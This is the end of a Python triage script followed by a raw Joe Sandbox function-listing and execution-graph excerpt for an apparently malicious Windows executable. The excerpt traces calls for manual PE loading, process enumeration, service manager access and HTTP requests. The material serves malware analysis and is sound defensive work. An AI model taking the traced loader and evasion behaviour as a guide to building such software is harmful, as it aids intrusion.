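API_RE = re.compile(r"^(?P<api>[\w@]+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s+ref:\s+(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Offset:\s+(?P<off>[0-9A-Fa-f]+),\s+based on PE:\s+(?P<pe>true|false)")

# Subset of PROCESS_* access rights (winnt.h values); chosen for this example, not exhaustive.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}

def _arg(tok):
    """Hex argument -> int; '?' (not recovered by the sandbox) -> None; anything else stays a string."""
    tok = tok.strip()
    if tok in ("", "?"):
        return None
    try:
        return int(tok, 16)
    except ValueError:
        return tok

def parse_listing(text):
    """Split the listing into function entries, each starting at an 'APIs' header."""
    funcs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "subcalls": [], "offset": None, "in_image": None, "api_id": None, "string_id": None}
            funcs.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("• "):
            line = line[2:]
        m = SRC_RE.search(line)
        if m:
            cur["offset"] = int(m.group("off"), 16)
            cur["in_image"] = m.group("pe") == "true"
            continue
        if line.startswith("API ID: "):
            cur["api_id"] = line[len("API ID: "):]
            continue
        if line.startswith("String ID: "):
            cur["string_id"] = line[len("String ID: "):]
            continue
        nested = line.startswith("Part of subcall function")
        if nested:
            line = line.split(": ", 1)[1]
        m = API_RE.match(line)
        if m:
            args = m.group("args")
            call = {"api": m.group("api"), "module": m.group("mod"), "ref": int(m.group("ref"), 16),
                    "args": [_arg(a) for a in args.split(",")] if args is not None else []}
            (cur["subcalls"] if nested else cur["apis"]).append(call)
    return funcs

def decode_process_access(mask):
    """Expand an OpenProcess desired-access mask into right names, keeping unknown bits as hex."""
    names = [name for bit, name in sorted(PROCESS_RIGHTS.items()) if mask & bit]
    rest = mask & ~sum(PROCESS_RIGHTS)
    if rest:
        names.append("0x%X" % rest)
    return names

def triage(funcs):
    """Flag the two behaviours worth a second look in this section."""
    findings = []
    for f in funcs:
        names = {c["api"] for c in f["apis"]} | {c["api"] for c in f["subcalls"]}
        if "OpenProcess" in names and "TerminateProcess" in names:
            op = next(c for c in f["apis"] if c["api"] == "OpenProcess")
            mask = op["args"][0] if op["args"] and isinstance(op["args"][0], int) else None
            rights = "|".join(decode_process_access(mask)) if mask is not None else "?"
            findings.append(("process-kill", f["offset"], "OpenProcess(%s) followed by TerminateProcess" % rights))
        if "VirtualProtect" in names and f["in_image"] is False:
            findings.append(("protect-outside-image", f["offset"],
                             "VirtualProtect in a dump region the report marks 'based on PE: false'"))
    return findings

if __name__ == "__main__":
    for kind, offset, detail in triage(parse_listing(SAMPLE)):
        print("%-22s %08X  %s" % (kind, offset, detail))
```

Feeding the whole function-listing section through parse_listing gives one record per entry, so the same two rules (or others keyed on api_id and string_id, such as the "%d K" Process32Next entries) can be run over the full report rather than read by eye.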
                                    APIs
                                    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 020E21F9
                                    • SetLastError.KERNEL32(0000007E), ref: 020E223B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorHugeLastRead
                                    • String ID:
                                    • API String ID: 3239643929-0
                                    • Opcode ID: 90f669aceeb3734c1bb66e06c95fe2cd4e1c493497a40b36449bdfc671141d82
                                    • Instruction ID: 760a9aa74f39a7e80903f3dd570bdf52e43b904cb3bd010d02fc78a68305e8e1
                                    • Opcode Fuzzy Hash: 90f669aceeb3734c1bb66e06c95fe2cd4e1c493497a40b36449bdfc671141d82
                                    • Instruction Fuzzy Hash: 7081BA74A00209EFDB04CF94C890BADBBB5FF88314F148198E90AAB355C774AA81DF90
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0041589E
                                    • __isleadbyte_l.LIBCMT ref: 004158D1
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,?,00000000,00000000,?,?,?), ref: 00415902
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00001000,00000001,00000000,00000000,?,?,?), ref: 00415970
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    • Opcode ID: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction ID: 1bfa8a3c802f93689ab76b22000e8837c631d4e9b9b80ec41d52cc0f2dacea33
                                    • Opcode Fuzzy Hash: c0eb2632c6278a3be84097047c3844163cff7a0479a0ebec46df9903c1e59601
                                    • Instruction Fuzzy Hash: CE31D271A10646EFDB20EF64C880AEE3BB5FF81320F14856AE4659B2A1D334DDD0DB59
                                    APIs
                                    • _free.LIBCMT ref: 004167A8
                                      • Part of subcall function 0041025B: __FF_MSGBANNER.LIBCMT ref: 00410274
                                      • Part of subcall function 0041025B: __NMSG_WRITE.LIBCMT ref: 0041027B
                                      • Part of subcall function 0041025B: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00413CED,?,00000001,?,?,004147E0,00000018,0041BE58,0000000C,00414870), ref: 004102A0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction ID: 3c08702fd25ada2266926da53e5058be595d777b16bfef6a83bfe969bb48a588
                                    • Opcode Fuzzy Hash: 291dd56cd004a0e554d27551375521f7d94099034c9c239543eeae30dd5861c5
                                    • Instruction Fuzzy Hash: 6211EB32501611ABDB213FB5BC15ADA3794AF44378B21843BF869962A0DB3DCCC1869C
                                    APIs
                                    • VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 020E2468
                                    • VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 020E24B2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: @
                                    • API String ID: 544645111-2766056989
                                    • Opcode ID: fabc3a80ff7879334b2c9a73ae1c752efeac9b6b551766d6640930bd000344aa
                                    • Instruction ID: 8e90ad59043f76ee3685f25b3d2d8ee087f131de6606b73ad576d6c1b2724691
                                    • Opcode Fuzzy Hash: fabc3a80ff7879334b2c9a73ae1c752efeac9b6b551766d6640930bd000344aa
                                    • Instruction Fuzzy Hash: E821B9B0E04209EFDF54CF94C984BAEBBB9BF44304F148599ED06AB245C774AB80EB55
                                    APIs
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 004106F3
                                      • Part of subcall function 004106ED: __getptd.LIBCMT ref: 00410703
                                    • __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: csm
                                    • API String ID: 803148776-1018135373
                                    • Opcode ID: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction ID: 69b6639a9ef3a36a169a6a5565f12a55bffb05f741e2618f410494396190d148
                                    • Opcode Fuzzy Hash: e3664caf934b3eefaaa5df4d7cacef43b1cf49a14ce4952649e901bdecbea5d6
                                    • Instruction Fuzzy Hash: 80014B348002058FCF34DF26D6406EEB3B5AF20311F14462FE44496359DBB89AE6EF49
                                    APIs
                                    • InitCommonControlsEx.COMCTL32 ref: 0040E7BF
                                    • CreateWindowExW.USER32(00000000,SysListView32,00419450,50010201,0000000A,00000028,00000190,000001F4,?,00000000,00000000,00000000), ref: 0040E7F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CommonControlsCreateInitWindow
                                    • String ID: SysListView32
                                    • API String ID: 2646078016-78025650
                                    • Opcode ID: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction ID: f3d3e535e189fff61838196dd880c7fe0caa92239aab9ee536b101cdf5704626
                                    • Opcode Fuzzy Hash: f7c3c60ebf2b29c8cd91b1213f0e9bf28fa0210beb0f04a3fb4def70d8a6e988
                                    • Instruction Fuzzy Hash: 99E04F747843007FF6509B40DC5BF963764A788F05F50C024F649A51C0D6F46885866A

                                    Execution Graph

                                    Execution Coverage:4%
                                    Dynamic/Decrypted Code Coverage:76.1%
                                    Signature Coverage:3.6%
                                    Total number of Nodes:477
                                    Total number of Limit Nodes:55
                                    execution_graph 23970 40ec40 23975 40ebe0 23970->23975 23972 40ec48 23973 40ec71 VirtualAlloc 23972->23973 23974 40ec8a 23972->23974 23973->23974 23978 40e920 LoadLibraryW 23975->23978 23977 40ec09 23977->23972 23978->23977 24125 613060 24128 61307a 24125->24128 24126 61326f 24127 613215 24126->24127 24135 613e40 GetPEB 24126->24135 24128->24126 24128->24127 24129 613e40 GetPEB 24128->24129 24131 6131c3 RtlAllocateHeap 24128->24131 24133 613da0 GetPEB 24128->24133 24129->24128 24131->24127 24131->24128 24132 613283 24136 613da0 GetPEB 24132->24136 24133->24128 24135->24132 24136->24127 24564 731870 GetProcAddress 24565 410448 72 API calls ___InternalCxxFrameHandler 24629 413948 75 API calls 6 library calls 24631 73157a SetLastError 24555 616d79 24561 616d80 24555->24561 24556 616cd0 GetPEB LoadLibraryW 24556->24561 24557 616daf 24558 613480 GetPEB 24558->24561 24559 616e86 LoadLibraryW 24559->24561 24560 613e40 GetPEB 24560->24561 24561->24556 24561->24557 24561->24558 24561->24559 24561->24560 24562 613da0 GetPEB 24561->24562 24562->24561 24563 619878 GetPEB FindFirstChangeNotificationW GetCurrentProcess QueryFullProcessImageNameW lstrcmpiW 24632 418964 CloseHandle 24577 731840 LoadLibraryA 24582 615c20 39 API calls 24583 732430 VirtualProtect VirtualProtect 24584 732630 Process32Next CloseHandle 24585 412bb7 70 API calls 4 library calls 24497 619530 24503 619550 24497->24503 24498 619797 OpenSCManagerW 24498->24503 24499 6197fc 24502 61981b 24499->24502 24511 613e40 GetPEB 24499->24511 24501 613e40 GetPEB 24501->24503 24513 613000 FindFirstFileW FindNextFileW FindClose GetPEB 24502->24513 24503->24498 24503->24499 24503->24501 24505 613da0 GetPEB 24503->24505 24509 619587 24503->24509 24510 617950 GetPEB 24503->24510 24505->24503 24506 61980f 24512 613da0 GetPEB 24506->24512 24510->24503 24511->24506 24512->24502 24513->24509 23979 600000 23981 600005 23979->23981 23984 60002d 23981->23984 24004 600456 GetPEB 23984->24004 23987 
600456 GetPEB 23988 600053 23987->23988 23989 600456 GetPEB 23988->23989 23990 600061 23989->23990 23991 600456 GetPEB 23990->23991 23992 60006d 23991->23992 23993 600456 GetPEB 23992->23993 23994 60007b 23993->23994 23995 600456 GetPEB 23994->23995 23998 600089 23995->23998 23996 6000e4 GetNativeSystemInfo 23997 600107 VirtualAlloc 23996->23997 24002 600029 23996->24002 23999 60012f 23997->23999 23998->23996 23998->24002 24000 6003b2 23999->24000 24001 600388 VirtualProtect 23999->24001 24006 7327b0 24000->24006 24001->23999 24001->24002 24005 600045 24004->24005 24005->23987 24009 731000 24006->24009 24012 731030 LoadLibraryW GetProcAddress 24009->24012 24053 731b30 24012->24053 24015 7310a3 24017 731b30 SetLastError 24015->24017 24016 731091 SetLastError 24049 73102b ExitProcess 24016->24049 24018 7310b9 24017->24018 24019 7310f0 24018->24019 24020 7310de SetLastError 24018->24020 24018->24049 24021 731111 24019->24021 24022 7310ff SetLastError 24019->24022 24020->24049 24023 73111c SetLastError 24021->24023 24025 73112e GetNativeSystemInfo 24021->24025 24022->24049 24023->24049 24026 7311bc 24025->24026 24027 7311d7 SetLastError 24026->24027 24028 7311e9 24026->24028 24027->24049 24056 731800 VirtualAlloc 24028->24056 24029 731202 24030 73123d GetProcessHeap RtlAllocateHeap 24029->24030 24057 731800 VirtualAlloc 24029->24057 24031 731257 SetLastError 24030->24031 24032 73127b 24030->24032 24031->24049 24036 731b30 SetLastError 24032->24036 24033 731222 24033->24030 24034 73122e SetLastError 24033->24034 24034->24049 24038 7312fb 24036->24038 24037 731302 24084 7316c0 GetProcessHeap HeapFree VirtualFree 24037->24084 24038->24037 24058 731800 VirtualAlloc 24038->24058 24039 731320 24059 731b50 24039->24059 24042 73136b 24042->24037 24065 7321a0 24042->24065 24046 7313ca 24046->24037 24047 7313eb 24046->24047 24048 7313ff GetPEB 24047->24048 24047->24049 24048->24049 24054 731070 24053->24054 24055 731b3b SetLastError 24053->24055 24054->24015 24054->24016 
24054->24049 24055->24054 24056->24029 24057->24033 24058->24039 24063 731b7d 24059->24063 24060 731b30 SetLastError 24061 731c32 24060->24061 24062 731be9 24061->24062 24085 731800 VirtualAlloc 24061->24085 24062->24042 24063->24060 24063->24062 24066 7313b5 24065->24066 24067 7321dd IsBadHugeReadPtr 24065->24067 24066->24037 24078 731e80 24066->24078 24067->24066 24069 732207 24067->24069 24069->24066 24070 732239 SetLastError 24069->24070 24071 73224d 24069->24071 24070->24066 24086 731a20 VirtualQuery VirtualFree VirtualAlloc 24071->24086 24073 732267 24074 732273 SetLastError 24073->24074 24076 73229d 24073->24076 24074->24066 24076->24066 24077 7323ae SetLastError 24076->24077 24077->24066 24081 731eba 24078->24081 24079 731fe5 24080 731d10 2 API calls 24079->24080 24083 731fc1 24080->24083 24081->24079 24081->24083 24087 731d10 24081->24087 24083->24046 24084->24049 24085->24062 24086->24073 24088 731d29 24087->24088 24092 731d1f 24087->24092 24089 731d37 24088->24089 24090 731d9d VirtualProtect 24088->24090 24089->24092 24094 731820 VirtualFree 24089->24094 24090->24092 24092->24081 24094->24092 24298 615f00 24304 615f13 24298->24304 24299 615fc5 24321 613580 GetPEB 24299->24321 24300 615fbe 24303 615fd1 24305 615ff3 24303->24305 24336 613e40 GetPEB 24303->24336 24304->24299 24304->24300 24334 613e40 GetPEB 24304->24334 24335 613da0 GetPEB 24304->24335 24322 615410 24305->24322 24309 615fe7 24337 613da0 GetPEB 24309->24337 24312 616035 24317 61605d 24312->24317 24340 613e40 GetPEB 24312->24340 24313 61601f 24338 613e40 GetPEB 24313->24338 24315 616029 24339 613da0 GetPEB 24315->24339 24319 616051 24341 613da0 GetPEB 24319->24341 24321->24303 24323 615426 24322->24323 24328 61543c 24322->24328 24342 613e40 GetPEB 24323->24342 24325 615430 24343 613da0 GetPEB 24325->24343 24327 6154b3 _snprintf 24327->24312 24327->24313 24328->24327 24329 61549b GetVolumeInformationW 24328->24329 24344 613e40 GetPEB 24328->24344 24329->24327 24331 61548a 24345 613da0 GetPEB 
24331->24345 24333 615496 24333->24329 24334->24304 24335->24304 24336->24309 24337->24305 24338->24315 24339->24312 24340->24319 24341->24317 24342->24325 24343->24328 24344->24331 24345->24333 24637 414920 5 API calls 2 library calls 24396 41092e 24446 411e80 24396->24446 24398 41093a GetStartupInfoW 24399 41094e HeapSetInformation 24398->24399 24401 410959 24398->24401 24399->24401 24447 412a4c HeapCreate 24401->24447 24402 4109a7 24403 4109b2 24402->24403 24473 410905 66 API calls 3 library calls 24402->24473 24474 413a77 86 API calls 4 library calls 24403->24474 24406 4109b8 24407 4109c4 __RTC_Initialize 24406->24407 24408 4109bc 24406->24408 24448 4143af 73 API calls __calloc_crt 24407->24448 24475 410905 66 API calls 3 library calls 24408->24475 24410 4109c3 24410->24407 24412 4109d1 24413 4109d5 24412->24413 24414 4109dd GetCommandLineA 24412->24414 24476 412820 66 API calls 3 library calls 24413->24476 24449 414318 71 API calls 2 library calls 24414->24449 24418 4109ed 24477 41425d 95 API calls 3 library calls 24418->24477 24420 4109f7 24421 410a03 24420->24421 24422 4109fb 24420->24422 24450 413fe7 94 API calls 7 library calls 24421->24450 24478 412820 66 API calls 3 library calls 24422->24478 24426 410a08 24427 410a14 24426->24427 24428 410a0c 24426->24428 24451 4125ff 77 API calls 4 library calls 24427->24451 24479 412820 66 API calls 3 library calls 24428->24479 24432 410a1b 24433 410a20 24432->24433 24434 410a27 24432->24434 24480 412820 66 API calls 3 library calls 24433->24480 24452 413f88 94 API calls 2 library calls 24434->24452 24438 410a2c 24439 410a32 24438->24439 24453 40fa80 24438->24453 24439->24438 24441 410a48 24442 410a56 24441->24442 24481 4127d6 66 API calls _doexit 24441->24481 24482 412802 66 API calls _doexit 24442->24482 24445 410a5b __setmbcp 24446->24398 24447->24402 24448->24412 24449->24418 24450->24426 24451->24432 24452->24438 24483 4101c0 24453->24483 24455 40fa93 LoadIconW LoadCursorW LoadIconW CreateThread 24456 40fb38 
24455->24456 24489 40ecc0 24455->24489 24457 40fb3d RegisterClassExW 24456->24457 24458 40fb6e CreateWindowExW 24457->24458 24459 40fb4f MessageBoxW 24457->24459 24460 40fbb1 MessageBoxW 24458->24460 24461 40fbcf CreateWindowExW CreateWindowExW CreateWindowExW 24458->24461 24459->24441 24460->24441 24485 40e7b0 InitCommonControlsEx CreateWindowExW 24461->24485 24463 40fc70 24486 40e800 11 API calls __except_handler4 24463->24486 24465 40fc7b CreateWindowExW CreateWindowExW CreateWindowExW CreateWindowExW 24487 40e220 9 API calls __except_handler4 24465->24487 24467 40fd48 24488 40f770 143 API calls 24467->24488 24469 40fd4d SetTimer ShowWindow UpdateWindow GetMessageW 24470 40fd97 24469->24470 24472 40fdc3 24469->24472 24471 40fda4 TranslateMessage DispatchMessageW GetMessageW 24470->24471 24471->24471 24471->24472 24472->24441 24473->24403 24474->24406 24475->24410 24477->24420 24481->24442 24482->24445 24484 4101cc 24483->24484 24484->24455 24484->24484 24485->24463 24486->24465 24487->24467 24488->24469 24490 40ecc6 24489->24490 24644 40e930 81 API calls __except_handler4 24593 418a30 76 API calls __cinit 24594 413e30 SetUnhandledExceptionFilter 24645 617b10 FindFirstFileW FindNextFileW FindClose GetPEB 24137 6152e0 24141 6152f0 24137->24141 24138 6153d7 24139 6153bb GetNativeSystemInfo 24139->24141 24140 613e40 GetPEB 24140->24141 24141->24138 24141->24139 24141->24140 24142 613da0 GetPEB 24141->24142 24142->24141 24599 6146e0 GetPEB CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 24514 619bf0 24523 619c00 24514->24523 24515 619cde 24516 619d02 CreateThread 24515->24516 24525 613e40 GetPEB 24515->24525 24517 619c95 24516->24517 24527 619860 24516->24527 24519 619cf1 24526 613da0 GetPEB 24519->24526 24521 619cfd 24521->24516 24522 613da0 GetPEB 24522->24523 24523->24515 24523->24517 24523->24522 24524 613e40 GetPEB 24523->24524 24524->24523 24525->24519 24526->24521 24537 619880 24527->24537 24528 619a54 24529 619a47 24528->24529 24551 
613e40 GetPEB 24528->24551 24531 613e40 GetPEB 24531->24537 24532 619a67 24552 613da0 GetPEB 24532->24552 24533 619a90 4 API calls 24533->24537 24534 6198d2 FindFirstChangeNotificationW 24539 619a90 24534->24539 24537->24528 24537->24529 24537->24531 24537->24533 24537->24534 24538 613da0 GetPEB 24537->24538 24538->24537 24549 619aa0 24539->24549 24540 619aca 24540->24537 24541 619b9d 24544 619bc1 lstrcmpiW 24541->24544 24553 613e40 GetPEB 24541->24553 24542 613e40 GetPEB 24542->24549 24543 619b2e GetCurrentProcess QueryFullProcessImageNameW 24543->24549 24544->24537 24546 619bb0 24554 613da0 GetPEB 24546->24554 24547 613da0 GetPEB 24547->24549 24549->24540 24549->24541 24549->24542 24549->24543 24549->24547 24550 619bbc 24550->24544 24551->24532 24552->24529 24553->24546 24554->24550 24649 61adf0 GetPEB GetVolumeInformationW _snprintf 24650 7321ea 7 API calls 24604 411ee0 6 API calls 2 library calls 24605 4122ed IsProcessorFeaturePresent 24608 412cee 69 API calls FindHandler 24655 40edf0 66 API calls std::exception::exception 24491 6180d0 24496 6181a1 24491->24496 24492 6181fb CreateFileW 24493 6182f5 24492->24493 24492->24496 24494 613e40 GetPEB 24494->24496 24495 613da0 GetPEB 24495->24496 24496->24492 24496->24493 24496->24494 24496->24495 24612 6020de GetPEB 24095 40ea80 24100 41025b 24095->24100 24098 41025b std::exception::_Copy_str 66 API calls 24099 40ea9b 24098->24099 24101 4102d8 24100->24101 24105 410269 24100->24105 24123 412a79 DecodePointer 24101->24123 24103 4102de 24124 411e2c 66 API calls __getptd_noexit 24103->24124 24104 410274 24104->24105 24117 412a13 66 API calls 2 library calls 24104->24117 24118 412864 66 API calls 8 library calls 24104->24118 24119 41257e GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 24104->24119 24105->24104 24108 410297 RtlAllocateHeap 24105->24108 24111 4102c4 24105->24111 24115 4102c2 24105->24115 24120 412a79 DecodePointer 24105->24120 24108->24105 24109 40ea93 24108->24109 24109->24098 24121 411e2c 
66 API calls __getptd_noexit 24111->24121 24122 411e2c 66 API calls __getptd_noexit 24115->24122 24117->24104 24118->24104 24120->24105 24121->24115 24122->24109 24123->24103 24124->24109 24613 410881 67 API calls __calloc_crt 24143 6112a0 24167 6112d1 24143->24167 24144 611817 24158 611836 24144->24158 24232 613e40 GetPEB 24144->24232 24146 614120 GetPEB 24146->24167 24147 61182a 24233 613da0 GetPEB 24147->24233 24151 613da0 GetPEB 24151->24167 24153 6117d7 24154 613480 GetPEB 24154->24167 24158->24153 24234 613e40 GetPEB 24158->24234 24159 613e40 GetPEB 24159->24167 24162 611852 24235 613da0 GetPEB 24162->24235 24167->24144 24167->24146 24167->24151 24167->24153 24167->24154 24167->24159 24168 613420 GetPEB 24167->24168 24169 611801 24167->24169 24172 612b60 24167->24172 24191 615b40 24167->24191 24213 612210 GetPEB RtlAllocateHeap 24167->24213 24214 614060 GetPEB 24167->24214 24215 611e50 GetPEB 24167->24215 24216 611940 GetPEB 24167->24216 24217 614db0 GetPEB 24167->24217 24218 611fa0 GetPEB RtlAllocateHeap 24167->24218 24219 6141c0 24167->24219 24230 611c70 GetPEB 24167->24230 24168->24167 24231 614120 GetPEB 24169->24231 24171 611808 24190 612b98 24172->24190 24173 612f94 24177 612fb3 24173->24177 24249 613e40 GetPEB 24173->24249 24174 612e0d InternetOpenW 24174->24190 24176 612d2b HttpSendRequestW 24176->24190 24177->24167 24178 612ec8 InternetCloseHandle 24178->24190 24180 6141c0 2 API calls 24180->24190 24181 612c9e InternetConnectW 24181->24190 24183 612fa7 24250 613da0 GetPEB 24183->24250 24184 613e40 GetPEB 24184->24190 24186 612daf ObtainUserAgentString 24186->24190 24187 613da0 GetPEB 24187->24190 24190->24173 24190->24174 24190->24176 24190->24177 24190->24178 24190->24180 24190->24181 24190->24184 24190->24186 24190->24187 24236 612900 GetPEB 24190->24236 24237 615620 GetPEB 24190->24237 24238 614120 GetPEB 24190->24238 24239 613480 24190->24239 24192 615b50 24191->24192 24193 615b66 24191->24193 24255 613e40 GetPEB 24192->24255 24196 615b93 
RtlAllocateHeap 24193->24196 24257 613e40 GetPEB 24193->24257 24195 615b5a 24256 613da0 GetPEB 24195->24256 24199 615c12 24196->24199 24203 615ba3 24196->24203 24199->24167 24200 615b82 24258 613da0 GetPEB 24200->24258 24202 615b8e 24202->24196 24208 615bd9 24203->24208 24259 613e40 GetPEB 24203->24259 24205 615bcd 24260 613da0 GetPEB 24205->24260 24207 615c06 RtlFreeHeap 24207->24167 24208->24207 24261 613e40 GetPEB 24208->24261 24210 615bf5 24262 613da0 GetPEB 24210->24262 24212 615c01 24212->24207 24213->24167 24214->24167 24215->24167 24216->24167 24217->24167 24218->24167 24220 6141e3 24219->24220 24221 6141cd 24219->24221 24225 614210 RtlAllocateHeap 24220->24225 24265 613e40 GetPEB 24220->24265 24263 613e40 GetPEB 24221->24263 24223 6141d7 24264 613da0 GetPEB 24223->24264 24225->24167 24227 6141ff 24266 613da0 GetPEB 24227->24266 24229 61420b 24229->24225 24230->24167 24231->24171 24232->24147 24233->24158 24234->24162 24235->24153 24236->24190 24237->24190 24238->24190 24240 6134a3 24239->24240 24241 6134c8 24240->24241 24251 613e40 GetPEB 24240->24251 24248 6134f0 24241->24248 24253 613e40 GetPEB 24241->24253 24243 6134bc 24252 613da0 GetPEB 24243->24252 24246 6134e4 24254 613da0 GetPEB 24246->24254 24248->24190 24249->24183 24250->24177 24251->24243 24252->24241 24253->24246 24254->24248 24255->24195 24256->24193 24257->24200 24258->24202 24259->24205 24260->24208 24261->24210 24262->24212 24263->24223 24264->24220 24265->24227 24266->24229 24616 7326b0 wcslen wcslen wcslen 24660 413787 TlsAlloc 24380 614ba8 24393 614bb0 24380->24393 24381 614c5a Process32FirstW 24381->24393 24382 614cc8 24385 614cec FindCloseChangeNotification 24382->24385 24394 613e40 GetPEB 24382->24394 24383 614cb4 24384 613e40 GetPEB 24384->24393 24387 614cef 24385->24387 24388 614cdb 24395 613da0 GetPEB 24388->24395 24389 614bfe CreateToolhelp32Snapshot 24389->24387 24389->24393 24390 613da0 GetPEB 24390->24393 24392 614ce7 24392->24385 24393->24381 24393->24382 24393->24383 
24393->24384 24393->24389 24393->24390 24394->24388 24395->24392 24617 6160a2 GetPEB RtlAllocateHeap CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 24663 410d8f 107 API calls 3 library calls 24619 7314a0 9 API calls 24620 40f5e0 137 API calls 2 library calls 24666 611fb2 GetPEB RtlAllocateHeap 24621 410a9b 5 API calls ___security_init_cookie 24267 611880 24268 6118a2 24267->24268 24269 61188c 24267->24269 24277 6118cb 24268->24277 24294 613e40 GetPEB 24268->24294 24292 613e40 GetPEB 24269->24292 24271 611896 24293 613da0 GetPEB 24271->24293 24274 6118bf 24295 613da0 GetPEB 24274->24295 24275 61192d 24277->24275 24282 6125a0 24277->24282 24279 611917 24280 61191b 24279->24280 24296 614120 GetPEB 24279->24296 24291 6125b0 24282->24291 24283 612812 CryptDecodeObjectEx 24283->24291 24284 6141c0 2 API calls 24284->24291 24285 6128de 24297 614120 GetPEB 24285->24297 24286 613e40 GetPEB 24286->24291 24288 6128e9 24288->24279 24289 613da0 GetPEB 24289->24291 24290 6125ec 24290->24279 24291->24283 24291->24284 24291->24285 24291->24286 24291->24289 24291->24290 24292->24271 24293->24268 24294->24274 24295->24277 24296->24275 24297->24288 24346 619180 24352 6191a0 24346->24352 24348 6191cd 24350 619255 24350->24348 24350->24352 24373 614b90 GetPEB CreateToolhelp32Snapshot Process32FirstW FindCloseChangeNotification 24350->24373 24352->24348 24352->24350 24354 6145c0 24352->24354 24371 613e40 GetPEB 24352->24371 24372 613da0 GetPEB 24352->24372 